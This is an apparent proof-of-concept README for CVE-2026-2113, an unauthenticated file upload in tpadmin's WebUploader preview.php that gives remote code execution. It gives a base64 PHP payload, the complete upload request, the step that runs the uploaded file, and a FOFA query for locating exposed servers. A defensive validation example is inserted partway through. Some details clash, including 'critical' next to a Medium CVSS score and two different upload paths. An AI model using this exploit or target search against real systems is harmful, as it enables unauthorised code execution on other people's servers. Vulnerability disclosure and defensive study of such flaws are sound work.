yuan1994 tpadmin Shell Upload

# tpadmin-CVE-2026-2113-poc

A proof-of-concept exploiting a Remote Code Execution with web server privileges via Arbitrary File Upload.

# Vulnerability Description

A critical Remote Code Execution vulnerability exists in the WebUploader preview component of the H-ui.admin system. The `/public/static/admin/lib/webuploader/0.1.5/server/preview.php` file lacks proper authentication and file validation, allowing unauthenticated attackers to upload arbitrary PHP files directly to the web server. This results in immediate Remote Code Execution with web server privileges.
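
The two checks the description says are missing, authentication and file validation, sketched for a handler that accepts base64 data URIs. This is an added example, not code from tpadmin or WebUploader; the function name, allowlist and size cap are assumptions, and it relies on PHP's fileinfo extension.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical helper, not code from tpadmin or WebUploader.
// Allowlist maps the sniffed content type to the only extensions ever written.
const ALLOWED_TYPES = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];
const MAX_BODY_BYTES = 3 * 1024 * 1024; // assumed cap on the encoded request body

/** Returns [extension, decoded bytes] for an acceptable image; throws otherwise. */
function validate_preview_upload(string $body, bool $authenticated): array
{
    if (!$authenticated) {
        throw new RuntimeException('authentication required');
    }
    if (strlen($body) > MAX_BODY_BYTES) {
        throw new InvalidArgumentException('body too large');
    }
    // The client-declared subtype is matched but never used to name the file.
    if (!preg_match('#^data:image/[a-z0-9.+-]+;base64,([A-Za-z0-9+/]+={0,2})$#D', $body, $m)) {
        throw new InvalidArgumentException('not a base64 image data URI');
    }
    $bytes = base64_decode($m[1], true);
    if ($bytes === false) {
        throw new InvalidArgumentException('invalid base64');
    }
    // Decide the type from the decoded content, not from the request.
    $mime = (string) (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes);
    $ext = ALLOWED_TYPES[$mime] ?? null;
    if ($ext === null) {
        throw new InvalidArgumentException("content type '$mime' is not allowed");
    }
    return [$ext, $bytes];
}

// Constructed inputs: the request body from the PoC's step 2, and a 1x1 PNG declared as "php".
$samples = [
    'step 2 body' => 'data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+',
    'png declared as php' => 'data:image/php;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==',
];
foreach ($samples as $label => $body) {
    try {
        [$ext, $bytes] = validate_preview_upload($body, true);
        // Random server-chosen name plus allowlisted extension.
        $name = bin2hex(random_bytes(16)) . '.' . $ext;
        echo "$label: accepted, would be stored as $name\n";
    } catch (Exception $e) {
        echo "$label: rejected ({$e->getMessage()})\n";
    }
}
```

Content sniffing alone does not stop an image with script text appended to it, so the stored extension must always come from the allowlist, and the upload directory should be served with script execution disabled.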

# Affected Versions

- tpadmin up to version 1.3.12

# PoC (by sTy1H)

1. Construct payload (Encode the dangerous statement in base64)
```bash
printf "<?php phpinfo();?>" | base64
PD9waHAgcGhwaW5mbygpOz8+
```

2. Construct the POST request with our payload
```http
POST /admin/lib/webuploader/0.1.5/server/preview.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=6mqs895r9r0k9ci9jj0hms506n
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+
```

3. Visit the returned URL

<img width="800" height="600" alt="image" src="https://github.com/user-attachments/assets/beaa331e-0553-4b71-b4bc-a38dcbd759e5" />

# Into the wild

FOFA:

```
title='Tpadmin'
```

# Impact

An unauthenticated remote attacker can exploit the Arbitrary File Upload to achieve RCE with web server privileges.

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P - 6.9:Medium

# Remediation & Mitigation

No countermeasures are currently known. Replacing the affected component with an alternative product may be advisable.

# References

- https://github.com/yuan1994/tpAdmin
- https://www.cve.org/CVERecord?id=CVE-2026-2113
- https://github.com/sTy1H/CVE-Report/blob/main/Remote%20Code%20Execution%20Vulnerability%20in%20Tpadmin%20System.md